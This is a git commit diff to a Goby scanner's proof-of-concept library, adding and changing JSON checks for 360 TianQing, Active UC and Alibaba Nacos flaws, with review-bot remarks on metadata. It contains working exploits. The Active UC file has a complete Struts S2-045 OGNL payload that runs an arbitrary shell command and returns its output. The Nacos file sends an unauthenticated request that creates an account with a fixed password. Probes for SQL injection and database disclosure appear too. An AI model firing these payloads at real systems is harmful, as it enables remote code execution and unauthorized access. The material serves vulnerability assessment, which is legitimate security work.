
Commit f8382bb

committed
up lib/goby 2022-09-02
1 parent bd73133 commit f8382bb


370 files changed

+2054
-2135
lines changed


370 files changed

+2054
-2135
lines changed
Lines changed: 12 additions & 55 deletions
@@ -1,31 +1,25 @@
11
{
22
"Name": "360 TianQing ccid SQL injectable",
33
"Level": "2",
4-
"Tags": [
5-
"sqli"
6-
],
4+
"Tags": [],
75
"GobyQuery": "app=\"360-TianQing\"",
8-
"Description": "",
6+
"Description": "The attacker can get the server permission by injecting SQL into the upload Trojan",
97
"Product": "360 TianQing",
10-
"Homepage": "https://360.net/product-center/Endpoint-Security/management-system",
11-
"Author": "",
12-
"Impact": "The attacker can get the server permission by injecting SQL into the upload Trojan.",
13-
"Recommendation": "update",
14-
"References": [],
15-
"HasExp": true,
16-
"ExpParams": null,
17-
"ExpTips": {
18-
"Type": "",
19-
"Content": ""
20-
},
8+
"Homepage": "htp://360.cn",
9+
"Author": "PeiQi",
10+
"Impact": "<p>The attacker can get the server permission by injecting SQL into the upload Trojan<br></p>",
11+
"Recommandation": "",
12+
"References": [
13+
"http://wiki.peiqi.tech"
14+
],
2115
"ScanSteps": [
2216
"AND",
2317
{
2418
"Request": {
2519
"method": "GET",
2620
"uri": "/api/dp/rptsvcsyncpoint?ccid=1",
2721
"follow_redirect": true,
28-
"header": null,
22+
"header": {},
2923
"data_type": "text",
3024
"data": ""
3125
},
@@ -66,43 +60,6 @@
6660
"SetVariable": []
6761
}
6862
],
69-
"ExploitSteps": [
70-
"AND",
71-
{
72-
"Request": {
73-
"method": "GET",
74-
"uri": "/test.php",
75-
"follow_redirect": true,
76-
"header": null,
77-
"data_type": "text",
78-
"data": "",
79-
"set_variable": []
80-
},
81-
"ResponseTest": {
82-
"type": "group",
83-
"operation": "AND",
84-
"checks": [
85-
{
86-
"type": "item",
87-
"variable": "$code",
88-
"operation": "==",
89-
"value": "200",
90-
"bz": ""
91-
},
92-
{
93-
"type": "item",
94-
"variable": "$body",
95-
"operation": "contains",
96-
"value": "test",
97-
"bz": ""
98-
}
99-
]
100-
},
101-
"SetVariable": [
102-
"output|lastbody|regex|"
103-
]
104-
}
105-
],
106-
"PostTime": "0000-00-00 00:00:00",
107-
"GobyVersion": "0.0.0"
63+
"PostTime": "2021-04-09 08:51:50",
64+
"GobyVersion": "1.8.255"
10865
}
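Review bot: The new `Homepage` value `htp://360.cn` has a misspelled scheme and will not work as a link; it should read `"Homepage": "http://360.cn",` or keep the product URL the commit removes. The same section empties `Tags` (dropping `sqli`) and replaces `"Recommendation": "update"` with an empty `"Recommandation": ""`, so the record no longer carries a classification or any remediation text for whoever triages a hit. If `Recommandation` is the spelling the consuming tool expects, it should still hold the advice, e.g. `"Recommandation": "update",`. The `Impact` string now embeds `<p>`/`<br>` markup, so any viewer that displays it has to sanitize the field rather than insert it as raw HTML.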
Lines changed: 13 additions & 54 deletions
@@ -1,31 +1,27 @@
11
{
2-
"Name": "360 TianQing database information disclosure",
2+
"Name": "360 Tianqing database information disclosure",
33
"Level": "0",
44
"Tags": [
55
"Disclosure of Sensitive Information"
66
],
77
"GobyQuery": "app=\"360-TianQing\"",
8-
"Description": "",
9-
"Product": "360 TianQing",
10-
"Homepage": "https://360.net/product-center/Endpoint-Security/management-system",
11-
"Author": "",
12-
"Impact": "Tianqing has unauthorized unauthorized unauthorized access, resulting in the disclosure of sensitive information.",
13-
"Recommendation": "update",
14-
"References": [],
15-
"HasExp": true,
16-
"ExpParams": null,
17-
"ExpTips": {
18-
"Type": "",
19-
"Content": ""
20-
},
8+
"Description": "Tianqing has unauthorized unauthorized unauthorized access, resulting in the disclosure of sensitive information",
9+
"Product": "360 Tianqing",
10+
"Homepage": "https://www.360.cn/",
11+
"Author": "PeiQi",
12+
"Impact": "",
13+
"Recommandation": "<p>undefined</p>",
14+
"References": [
15+
"http://wiki.peiqi.tech"
16+
],
2117
"ScanSteps": [
2218
"AND",
2319
{
2420
"Request": {
2521
"method": "GET",
2622
"uri": "/api/dbstat/gettablessize",
2723
"follow_redirect": false,
28-
"header": null,
24+
"header": {},
2925
"data_type": "text",
3026
"data": ""
3127
},
@@ -66,43 +62,6 @@
6662
"SetVariable": []
6763
}
6864
],
69-
"ExploitSteps": [
70-
"AND",
71-
{
72-
"Request": {
73-
"method": "GET",
74-
"uri": "/test.php",
75-
"follow_redirect": true,
76-
"header": null,
77-
"data_type": "text",
78-
"data": "",
79-
"set_variable": []
80-
},
81-
"ResponseTest": {
82-
"type": "group",
83-
"operation": "AND",
84-
"checks": [
85-
{
86-
"type": "item",
87-
"variable": "$code",
88-
"operation": "==",
89-
"value": "200",
90-
"bz": ""
91-
},
92-
{
93-
"type": "item",
94-
"variable": "$body",
95-
"operation": "contains",
96-
"value": "test",
97-
"bz": ""
98-
}
99-
]
100-
},
101-
"SetVariable": [
102-
"output|lastbody|regex|"
103-
]
104-
}
105-
],
106-
"PostTime": "0000-00-00 00:00:00",
107-
"GobyVersion": "0.0.0"
65+
"PostTime": "2021-04-08 16:04:28",
66+
"GobyVersion": "1.8.255"
10867
}
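Review bot: `"Recommandation": "<p>undefined</p>"` looks like an unset editor value serialized into the record, so a finding from this check would show the literal word "undefined" as its remediation advice, where the removed line at least said `update`. Put real guidance there or leave it empty, e.g. `"Recommandation": "update",`. The sentence moved into `Description` still repeats "unauthorized" three times and `Impact` is now empty, so the one explanation of the exposure should be cleaned up and kept where triage tooling reads it. `Name` and `Product` switch to `360 Tianqing` while `GobyQuery` and the ccid record earlier on this page keep `TianQing`, which will split the product across two spellings in reports.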

lib/goby/goby_pocs/ADSelfService_Plus_RCE_CVE-2021-40539.json

100755100644
File mode changed.

lib/goby/goby_pocs/ADSelfService_Plus_RCE_CVE_2021_40539.json

100755100644
File mode changed.

lib/goby/goby_pocs/AVCON6_org_execl_download.action_file_down.json

100755100644
File mode changed.

lib/goby/goby_pocs/Active_UC_index.action_RCE.json

100755100644
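--- a/lib/goby/goby_pocs/Active_UC_index.action_RCE.json
+++ b/lib/goby/goby_pocs/Active_UC_index.action_RCE.json
@@ -1,29 +1,28 @@
 {
-"Name": "Active UC index.action RCE",
+"Name": "Active UC index.action 远程命令执行漏洞",
 "Level": "3",
 "Tags": [
 "RCE"
 ],
 "GobyQuery": "title=\"网动统一通信平台(Active UC)\"",
-"Description": "",
-"Product": "Active UC",
-"Homepage": "http://www.iactive.com.cn/",
-"Author": "",
-"Impact": "Active UC index.action has a RCE vulnerability.",
-"Recommendation": "update",
-"References": [],
-"HasExp": true,
-"ExpParams": [
-{
-"Name": "cmd",
-"Type": "input",
-"Value": "whoami"
-}
+"Description": "网动统一通信平台 Active UC index.action 存在S2-045远程命令执行漏洞, 通过漏洞可以执行任意命令",
+"Product": "网动统一通信平台(Active UC)",
+"Homepage": "https://gobies.org/",
+"Author": "luckying",
+"Impact": "",
+"Recommandation": "",
+"References": [
+"https://gobies.org/"
 ],
-"ExpTips": {
-"Type": "",
-"Content": ""
-},
+"HasExp": true,
+"ExpParams": [
+{
+"name": "Cmd",
+"type": "input",
+"value": "whoami",
+"show": ""
+}
+],
 "ScanSteps": [
 "AND",
 {
@@ -42,7 +41,7 @@
 "Pragma": "no-cache"
 },
 "data_type": "text",
-"data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170"
+"data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170"
 },
 "ResponseTest": {
 "type": "group",
@@ -60,7 +59,7 @@
 "SetVariable": []
 }
 ],
-"ExploitSteps": [
+"ExploitSteps": [
 "AND",
 {
 "Request": {
@@ -73,12 +72,12 @@
 "Connection": "close",
 "Cookie": "SessionId=96F3F15432E0660E0654B1CE240C4C36",
 "Charsert": "UTF-8",
-"Content-Type": "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170",
+"Content-Type": "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{Cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170",
 "Cache-Control": "no-cache",
 "Pragma": "no-cache"
 },
 "data_type": "text",
-"data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170"
+"data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170"
 },
 "ResponseTest": {
 "type": "group",
@@ -94,10 +93,10 @@
 ]
 },
 "SetVariable": [
-"output|lastbody|undefined|undefined"
-]
+"output|lastbody"
+]
 }
 ],
-"PostTime": "0000-00-00 00:00:00",
-"GobyVersion": "0.0.0"
+"PostTime": "2021-06-28 10:08:54",
+"GobyVersion": "1.8.268"
 }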
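Review bot: The metadata hunk at the top replaces the vendor homepage `http://www.iactive.com.cn/` with `https://gobies.org/` and uses the same URL as the only entry in `References`, so neither field points at the affected product or at an advisory for the S2-045 issue the new `Description` names. `Impact` and `Recommandation` are both empty, which removes the previous `update` advice and leaves a level-3 finding with no remediation text. Keep `"Homepage": "http://www.iactive.com.cn/",` and fill in the advice, e.g. `"Recommandation": "Upgrade the Apache Struts component to a release that fixes S2-045",`, with the Apache Struts S2-045 bulletin as the reference.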

lib/goby/goby_pocs/Adobe_ColdFusion_LFI_CVE-2010-2861.json

100755100644
File mode changed.

lib/goby/goby_pocs/Adslr_Enterprise_online_behavior_management_system_Information_leak.json

100755100644
File mode changed.

lib/goby/goby_pocs/Adslr_Enterprise_online_behavior_management_system_Information_leakage.json

100755100644
File mode changed.

lib/goby/goby_pocs/Alibaba Nacos 控制台默认弱口令.json

100755100644
File mode changed.

lib/goby/goby_pocs/Alibaba Nacos 未授权访问漏洞.json

100755100644
File mode changed.

lib/goby/goby_pocs/Alibaba_Nacos_Add_user_not_authorized.json

100755100644
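--- a/lib/goby/goby_pocs/Alibaba_Nacos_Add_user_not_authorized.json
+++ b/lib/goby/goby_pocs/Alibaba_Nacos_Add_user_not_authorized.json
@@ -2,38 +2,39 @@
 "Name": "Alibaba Nacos Add user not authorized",
 "Level": "2",
 "Tags": [
-"unauthorized"
+"Ultra vires"
 ],
-"GobyQuery": "title=\"Nacos\"",
-"Description": "Alibaba Nacos is an easy-to-use platform designed for dynamic service discovery and configuration and service management. It helps you to build cloud native applications and microservices platform easily.",
+"GobyQuery": "title==\"Nacos\"",
+"Description": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.",
 "Product": "Alibaba Nacos",
 "Homepage": "https://github.com/alibaba/nacos",
-"Author": "",
-"Impact": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.",
-"Recommendation": "update",
-"References": [],
-"HasExp": true,
-"ExpParams": [
-{
-"Name": "User",
-"Type": "input",
-"Value": "test"
-},
-{
-"Name": "Pass",
-"Type": "input",
-"Value": "test"
-},
-{
-"Name": "Dir",
-"Type": "select",
-"Value": "/v1/auth/users,/nacos/v1/auth/users"
-}
+"Author": "PeiQi",
+"Impact": "<p>Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.<br></p>",
+"Recommandation": "<p>Upgrade version<br></p>",
+"References": [
+"http://wiki.peiqi.tech"
 ],
-"ExpTips": {
-"Type": "",
-"Content": ""
-},
+"HasExp": true,
+"ExpParams": [
+{
+"name": "User",
+"type": "input",
+"value": "PeiQi",
+"show": ""
+},
+{
+"name": "Pass",
+"type": "input",
+"value": "PeiQi",
+"show": ""
+},
+{
+"name": "Dir",
+"type": "select",
+"value": "/v1/auth/users,/nacos/v1/auth/users",
+"show": ""
+}
+],
 "ScanSteps": [
 "OR",
 {
@@ -89,7 +90,7 @@
 "SetVariable": []
 }
 ],
-"ExploitSteps": [
+"ExploitSteps": [
 "AND",
 {
 "Request": {
@@ -102,7 +103,7 @@
 "data_type": "text",
 "data": "username={{{User}}}&password={{{Pass}}}"
 },
-"ResponseTest": {
+"ResponseTest": {
 "type": "group",
 "operation": "AND",
 "checks": [
@@ -116,10 +117,10 @@
 ]
 },
 "SetVariable": [
-"output|lastbody|undefined|undefined"
-]
+"output|lastbody"
+]
 }
 ],
-"PostTime": "0000-00-00 00:00:00",
-"GobyVersion": "0.0.0"
+"PostTime": "2021-04-04 19:56:49",
+"GobyVersion": "1.8.255"
 }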
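Review bot: The new `ExpParams` defaults set both `User` and `Pass` to the same fixed string `PeiQi`, and the request body in the later hunk sends them as `username={{{User}}}&password={{{Pass}}}`, so a run that keeps the defaults leaves an account with a publicly known password on the assessed Nacos instance. Make the operator choose the password by shipping `"value": ""` for `Pass`, and state in `Description` that the created account must be deleted after the test; on the defensive side, a Nacos user named `PeiQi` (or `test`, the previous default) is worth checking for. `"Recommandation": "<p>Upgrade version<br></p>"` names no fixed release, and `References` links a plain-HTTP wiki rather than the GitHub issue the description cites. The tag also changes from `unauthorized` to `Ultra vires`, which no other record on this page uses, so filtering by tag will miss it.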
